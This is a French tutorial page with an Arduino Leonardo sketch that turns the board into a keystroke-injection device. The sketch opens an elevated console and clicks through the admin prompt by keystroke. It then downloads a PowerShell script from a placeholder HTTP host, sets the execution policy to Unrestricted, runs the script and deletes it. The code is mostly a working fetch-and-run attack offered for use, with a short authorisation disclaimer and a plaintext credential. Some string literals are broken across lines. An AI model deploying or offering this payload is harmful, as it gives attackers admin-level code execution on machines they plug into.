Exécution d’un Script Powershell avec une USB Rubber Ducky Arduino Leonardo

Le code ci-dessous est utilisable sur un Arduino Leonardo ou sur n’importe quel autre périphérique équipé de la puce « MEGA32U4 ». Le script va télécharger un script PowerShell depuis une URL distante, le copier sur le bureau, puis l’exécuter avant de quitter le shell.

Utilisé à des fins de pentest, un USB Rubber Ducky ne doit être employé que sur du matériel dont vous êtes propriétaire ou pour lequel vous disposez d’une autorisation.

#include "KeyboardAzertyFr.h"
/// Starts the HID keyboard emulation, then pauses for the "longer" delay
/// (5 x rdDelay = 500 ms) before any keystroke is produced — presumably to
/// let the host finish enumerating the device.
void start() {
  KeyboardAzertyFr.begin();
  for (int tick = 0; tick < 5; ++tick) {
    rdDelay();  // same pause as rdLongerDelay(), spelled out
  }
}
/// Stops the HID keyboard emulation; counterpart of start().
void finish() {
  KeyboardAzertyFr.end();
}
/// Base pause between keystrokes (100 ms). Every other rd* helper builds its
/// timing on this one, so tune it here rather than at the call sites.
void rdDelay() {
  constexpr unsigned long kStrokeGapMs = 100;
  delay(kStrokeGapMs);
}
/// Five base delays back to back (500 ms), used where the host needs time
/// to react (device enumeration, dialogs opening).
void rdLongerDelay() {
  int remaining = 5;
  while (remaining-- > 0) {
    rdDelay();
  }
}
/// Types `text` as a sequence of keystrokes, then waits one base delay so the
/// host can catch up before the next helper runs.
void rdWriteText(String text) {
  KeyboardAzertyFr.print(text);
  rdDelay();
}
/// Taps a single key: press, pause, release, pause (one base delay after
/// each edge, i.e. 200 ms per key).
void rdTypeKey(uint8_t key) {
  // press edge
  KeyboardAzertyFr.press(key);
  rdDelay();
  // release edge
  KeyboardAzertyFr.release(key);
  rdDelay();
}

/***********************
 *      Libraries      *
 ***********************
 * You may remove the  *
 * unused functions    *
 * before uploading    *
 * the code to the     *
 * arduino             *
 ***********************/

/**
 * Opens the Win+R "Run" dialog, types `program` and confirms with Return.
 * Example: "notepad" starts Notepad, "calc" the calculator.
 */
void rdRun(String program) {
  rdGuiCombination('r');   // Win+R
  rdWriteText(program);    // print + one base delay
  rdTypeKey(KEY_RETURN);
}

/**
 * Sends the PrintScreen key, then types "h" and "b".
 * Two raw key codes are sent because, according to the original author,
 * some hosts map PrtScn to 206, others to 229, and some to both.
 */
void rdPrintScreen() {
  const uint8_t printScreenCodes[] = {206, 229};
  for (uint8_t code : printScreenCodes) {
    rdTypeKey(code);
  }
  KeyboardAzertyFr.print(F("h"));
  rdDelay();
  KeyboardAzertyFr.print(F("b"));
  rdDelay();
}

/**
 * Ctrl+Shift+I — the shortcut common browsers use for their developer /
 * JavaScript console.
 */
void rdOpenJavascriptConsole() {
  rdKeyCombination(KEY_LEFT_CTRL, KEY_LEFT_SHIFT, 'i');
}

/**
 * "Hides" the active window: opens the window menu (Alt+Space), picks the
 * move entry ("M"), holds Down-Arrow for 10 x rdLongerDelay() (about 5 s,
 * relying on the host's key auto-repeat) so the window is dragged as far
 * down as possible, then confirms with Return, which also puts the cursor
 * back where it was.
 */
void rdHideWindow() {
  rdAltCombination(' ');
  KeyboardAzertyFr.print(F("M"));
  rdDelay();
  // Hold the key instead of tapping it; the original author found this
  // duration ample even though the host drops some of the repeats.
  KeyboardAzertyFr.press(KEY_DOWN_ARROW);
  for (int tick = 0; tick < 10; ++tick) {
    rdLongerDelay();
  }
  KeyboardAzertyFr.release(KEY_DOWN_ARROW);
  rdTypeKey(KEY_RETURN);
}

/**
 * Win+D (show desktop).
 */
void rdShowDesktop() {
  rdKeyCombination(KEY_LEFT_GUI, 'd');
}

/**
 * Ctrl+V (paste).
 */
void rdPaste() {
  rdKeyCombination(KEY_LEFT_CTRL, 'v');
}

/**
 * Ctrl+X (cut).
 */
void rdCut() {
  rdKeyCombination(KEY_LEFT_CTRL, 'x');
}

/**
 * Ctrl+C (copy).
 */
void rdCopy() {
  rdKeyCombination(KEY_LEFT_CTRL, 'c');
}

/**
 * Left Gui (Windows key) + `c`.
 */
void rdGuiCombination(uint8_t c) {
  const uint8_t modifier = KEY_LEFT_GUI;
  rdKeyCombination(modifier, c);
}

/**
 * Left Alt + `c`.
 */
void rdAltCombination(uint8_t c) {
  const uint8_t modifier = KEY_LEFT_ALT;
  rdKeyCombination(modifier, c);
}

/**
 * Left Ctrl + `c`.
 */
void rdCtrlCombination(uint8_t c) {
  const uint8_t modifier = KEY_LEFT_CTRL;
  rdKeyCombination(modifier, c);
}

/**
 * Left Shift + `c`.
 */
void rdShiftCombination(uint8_t c) {
  const uint8_t modifier = KEY_LEFT_SHIFT;
  rdKeyCombination(modifier, c);
}

/**
 * Presses `holdKey`, then `targetKey` (one base delay after each), and
 * releases every key currently held — including any the caller pressed
 * beforehand — followed by a final base delay.
 */
void rdKeyCombination(uint8_t holdKey, uint8_t targetKey) {
  const uint8_t sequence[] = {holdKey, targetKey};
  for (uint8_t key : sequence) {
    KeyboardAzertyFr.press(key);
    rdDelay();
  }
  KeyboardAzertyFr.releaseAll();
  rdDelay();
}

/**
 * Two hold keys + target key. `holdKey1` stays pressed until the two-key
 * overload calls releaseAll().
 */
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t targetKey) {
  KeyboardAzertyFr.press(holdKey1);
  rdDelay();
  rdKeyCombination(holdKey2, targetKey);  // releases holdKey1 as well
}

/**
 * Three hold keys + target key; chains down to the two-key overload, whose
 * releaseAll() lets go of all three modifiers.
 */
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t holdKey3, uint8_t targetKey) {
  KeyboardAzertyFr.press(holdKey1);
  rdDelay();
  rdKeyCombination(holdKey2, holdKey3, targetKey);
}

/**
 * Opens a non-elevated command prompt (admin = false).
 */
void rdOpenCommandPrompt() {
  const boolean elevated = false;
  rdOpenCommandPrompt(elevated);
}

/**
 * Opens a console. With admin == false it simply runs "cmd" through the Run
 * dialog. With admin == true it uses Win+X followed by "a" (the elevated
 * entry of the Win+X menu — the call in setup() documents it as opening
 * PowerShell on the author's machine) and then answers the elevation prompt
 * through rdAcceptWindowsSmartScreen().
 */
void rdOpenCommandPrompt(boolean admin) {
  if (!admin) {
    rdRun("cmd");
    return;
  }
  rdGuiCombination('x');
  KeyboardAzertyFr.print(F("a"));
  rdDelay();  // same 100 ms pause the other helpers use
  rdAcceptWindowsSmartScreen();
}

/**
 * Answers the Windows prompt that asks to grant admin permissions (the
 * original author calls it the "smart screen"): waits for it to appear,
 * moves focus one step left and presses space.
 */
void rdAcceptWindowsSmartScreen() {
  rdLongerDelay();  // wait until the prompt shows up
  rdTypeKey(KEY_LEFT_ARROW);
  rdDelay();
  KeyboardAzertyFr.print(F(" "));
  rdDelay();
}

/**
 * Alt+Shift — cycles the host's keyboard layout. A no-op when only one
 * layout is installed.
 */
void rdChangeKeyboardLayout() {
  rdKeyCombination(KEY_LEFT_ALT, KEY_LEFT_SHIFT);
}

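/**
 * Runs one or more PowerShell commands through the Run dialog.
 *
 * `scripts` holds the commands separated by '\n'. Every command before the
 * last one is wrapped in parentheses and joined with " ; "; the last one is
 * appended as-is, after the "powershell " prefix.
 *
 * Empty segments (a leading or doubled '\n') are skipped rather than typed:
 * the original only looped while the separator was found at index > 0, so
 * a leading '\n' stayed in the text and would have been typed as a
 * newline, most likely submitting the Run dialog early. The separator is
 * also located once per iteration instead of three times.
 */
void rdPowershellRun(String scripts) {
  const char delimiter = '\n';
  String finalScript = "powershell ";
  int cut = scripts.indexOf(delimiter);
  while (cut >= 0) {
    const String piece = scripts.substring(0, cut);
    if (piece.length() > 0) {
      finalScript = finalScript + "(" + piece + ") ; ";
    }
    scripts = scripts.substring(cut + 1);
    cut = scripts.indexOf(delimiter);
  }
  finalScript = finalScript + scripts;
  rdRun(finalScript);
}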

/// Variant of rdTypeKey with a longer hold (500 ms) and no pause after the
/// release. Takes an int; the value is presumably narrowed by
/// press()/release() — confirm against KeyboardAzertyFr.h.
void typeKey(int key) {
  constexpr unsigned long kHoldMs = 500;
  KeyboardAzertyFr.press(key);
  delay(kHoldMs);
  KeyboardAzertyFr.release(key);
}

/*********************
 *      Arduino      *
 *********************/
// ---------------------------------------------------
//  ' ' est le symbole qui désigne un espace, il a la valeur 44
//  Alt Gr azerty                   €                                                                    ~  #  {  [  |  `  \  ^  @    ' '  ]  }  ¤
//   Shift azerty       Q  B  C  D  E  F  G  H  I  J  K  L  ?  N  O  P  A  R  S  T  U  V  Z  X  Y  Z  1  2  3  4  5  6  7  8  9  0    ' '  °  +  ¨  £  µ  No fr  M  %  NONE  .  /  §    >
//         azerty       q  b  c  d  e  f  g  h  i  j  k  l  ,  n  o  p  a  r  s  t  u  v  z  x  y  z  &  é  "  '  (  -  è  _  ç  à    ' '  )  =  ^  $  *  No fr  m  ù   ²    ;  :  !    <
//         qwerty       a  b  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v  w  x  y  z  1  2  3  4  5  6  7  8  9  0    ' '  -  =  [  ]  \  No US  ;  '   `    ,  .  /   No US      
//       scancode       4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,  44, 45,46,47,48,49,  50,  51,52, 53,  54,55,56,  100};

/**
 * Arduino entry point: runs the whole keystroke sequence once.
 *
 * Typed into an elevated console, the sequence builds a path under the
 * user's Desktop, downloads a remote .ps1 there with Invoke-WebRequest,
 * relaxes the execution policy, runs the file, deletes it and exits.
 *
 * NOTE(review): several string literals below contain a raw line break
 * inside the quotes (the page extraction appears to have mangled them);
 * as shown they would not compile, so compare against the author's
 * original before reuse.
 */
void setup() {

   
  start();
  // Open a console "as administrator" (Win+X, then "a"); the author's
  // comment says this is PowerShell on their machine.
  rdOpenCommandPrompt(true);
  delay(500);
  // Start of the download command for the remote script.
  KeyboardAzertyFr.print("$output = $env:USERPROFILE");

  // Types a "+" for PowerShell string concatenation: on the AZERTY layout
  // "+" is Shift + the "=" key.
  KeyboardAzertyFr.press(KEY_LEFT_SHIFT);
  KeyboardAzertyFr.print("=");// "+" for concatenation
  KeyboardAzertyFr.release(KEY_LEFT_SHIFT);

  // NOTE(review): line break inside the literal — see header comment.
  KeyboardAzertyFr.print("'
");
 
  // Composes the "\" character for the PowerShell path.
  // Alt Gr = Ctrl + Alt
  KeyboardAzertyFr.press(KEY_LEFT_CTRL);
  KeyboardAzertyFr.press(KEY_LEFT_ALT);
  keyboardScanCode(37); // or keyboard.print('\');
  KeyboardAzertyFr.release(KEY_LEFT_ALT);
  KeyboardAzertyFr.release(KEY_LEFT_CTRL);
 
  // NOTE(review): line break inside the literal — see header comment.
   KeyboardAzertyFr.print("
Desktop");
   
  // Second "\" via Alt Gr, same as above.
  KeyboardAzertyFr.press(KEY_LEFT_CTRL);
  KeyboardAzertyFr.press(KEY_LEFT_ALT);
  keyboardScanCode(37); // or keyboard.print('\');
  KeyboardAzertyFr.release(KEY_LEFT_ALT);
  KeyboardAzertyFr.release(KEY_LEFT_CTRL);
  // NOTE(review): line break inside the literal — see header comment.
  KeyboardAzertyFr.print("
GetRessources.ps1';");
  // The rest of the command line is typed in one go, including the
  // plaintext password and the download URL ("monip" is the author's
  // placeholder host). It is ordinary console input, so on the host it
  // would typically be captured by PowerShell transcription and command
  // history. `Set-ExecutionPolicy Unrestricted -force` is given no -Scope,
  // so it defaults to the LocalMachine scope, and nothing in this sketch
  // restores it; the download is plain HTTP; the script is run and then
  // deleted ("& $output; Remove-Item").
  // NOTE(review): this literal also contains a raw line break.
  KeyboardAzertyFr.print("$securepassword = ConvertTo-SecureString '
user00290987' -AsPlainText -Force;$credentials = New-Object System.Management.Automation.PSCredential('user002', $securepassword);Invoke-WebRequest -Uri http://monip/ressources/GetRessources.ps1 -OutFile $output -Credential $credentials;Set-ExecutionPolicy Unrestricted -force; & $output;Remove-Item -path $output;exit;");

   delay(500);
   rdTypeKey(KEY_RETURN);  // submit the command line

 
  finish();  // stop emulating the keyboard


 
}

/// Nothing to do after setup(): the sequence runs once, so the Arduino main
/// loop is intentionally left empty.
void loop() {
  // intentionally empty
}



/// Taps a key by raw scan code (see the table above). Adding 136 follows
/// the Arduino Keyboard library convention where values >= 136 are sent as
/// raw HID usage codes — assumed to hold for KeyboardAzertyFr as well.
/// Held for 5 ms only, unlike the rd* helpers.
void keyboardScanCode(byte code) {
  const int rawKey = code + 136;
  KeyboardAzertyFr.press(rawKey);
  delay(5);
  KeyboardAzertyFr.release(rawKey);
}
